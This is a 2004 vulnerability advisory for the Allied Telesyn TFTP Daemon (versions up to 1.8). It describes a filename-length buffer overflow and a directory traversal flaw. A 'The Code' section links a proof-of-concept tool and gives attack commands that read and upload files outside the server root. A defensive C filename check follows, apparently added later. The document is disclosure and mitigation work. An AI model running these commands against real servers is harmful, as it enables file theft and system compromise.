#######################################################################

                             Luigi Auriemma

Application:  Allied Telesyn TFTP Daemon
              http://www.alliedtelesyn.com
              http://www.alliedtelesyn.co.nz/support/rapier/download.html
Versions:     <= 1.8
Platforms:    Windows
Bugs:         A] buffer overflow
              B] directory traversal
Exploitation: remote
Date:         30 October 2004
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Allied Telesyn TFTP Daemon (AT-TFTP) is a TFTP server whose primary
function is to transfer files between a PC and the vendor's network
products, but naturally it can also be used as a normal TFTP server.


#######################################################################

=======
2) Bugs
=======

------------------
A] buffer overflow
------------------

A buffer overflow occurs when the remote filename field is 229 bytes
or longer.


----------------------
B] directory traversal
----------------------

Using the classical dot-dot-slash pattern, an attacker is able to
download and upload files (upload only if the Read/Write mode is
selected) anywhere on the disk that holds the server's default
transfer directory.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/tftpx.zip

A]
tftpx -f server 229 none

B]
tftpx server ../secret.txt secret.txt
tftpx -u server ../../windows/calc.exe evil.exe


#######################################################################

======
4) Fix
======


No fix.
I have not been able to contact the developers because there are no
mail addresses on the website and those available in the readme file
are unavailable.


#######################################################################
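A request check that a TFTP server could apply before touching the filename, covering both bugs A] and B]. This is an added example, not AT-TFTP code and not part of the original advisory; MAX_NAME, the return codes and both function names are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TFTP_RRQ 1
#define TFTP_WRQ 2
#define MAX_NAME 128  /* assumed server-side limit, not AT-TFTP's real buffer size */

/* Returns 0 and copies the filename into out[MAX_NAME] when the request is
 * acceptable; -1 malformed, -2 filename too long, -3 path leaves the root. */
int tftp_check_request(const uint8_t *pkt, size_t len, char *out)
{
    if (len < 4) return -1;
    unsigned op = (unsigned)pkt[0] << 8 | pkt[1];
    if (op != TFTP_RRQ && op != TFTP_WRQ) return -1;

    /* Bug A: measure the name inside the datagram before any copy. */
    const uint8_t *name = pkt + 2;
    const uint8_t *end = memchr(name, 0, len - 2);
    if (end == NULL || end == name) return -1;  /* unterminated or empty */
    size_t n = (size_t)(end - name);
    if (n >= MAX_NAME) return -2;

    /* Bug B: no absolute paths, no drive letters or ':' stream names. */
    if (name[0] == '/' || name[0] == '\\' || memchr(name, ':', n)) return -3;
    /* Bug B: reject any ".." component, split on either separator. */
    size_t start = 0;
    for (size_t i = 0; i <= n; i++) {
        if (i == n || name[i] == '/' || name[i] == '\\') {
            if (i - start == 2 && name[start] == '.' && name[start + 1] == '.')
                return -3;
            start = i + 1;
        }
    }
    memcpy(out, name, n + 1);  /* n + 1 <= MAX_NAME, checked above */
    return 0;
}

/* Constructed sample input: builds opcode | filename | 0 | "octet" | 0. */
int check_name(unsigned op, const char *filename)
{
    uint8_t pkt[512];
    char out[MAX_NAME];
    size_t n = strlen(filename);
    if (n + 9 > sizeof pkt) return -1;
    pkt[0] = 0; pkt[1] = (uint8_t)op;
    memcpy(pkt + 2, filename, n + 1);
    memcpy(pkt + 3 + n, "octet", 6);
    return tftp_check_request(pkt, n + 9, out);
}
```

The check is purely lexical; a server should still resolve the final path and confirm it lies under the transfer directory before opening the file.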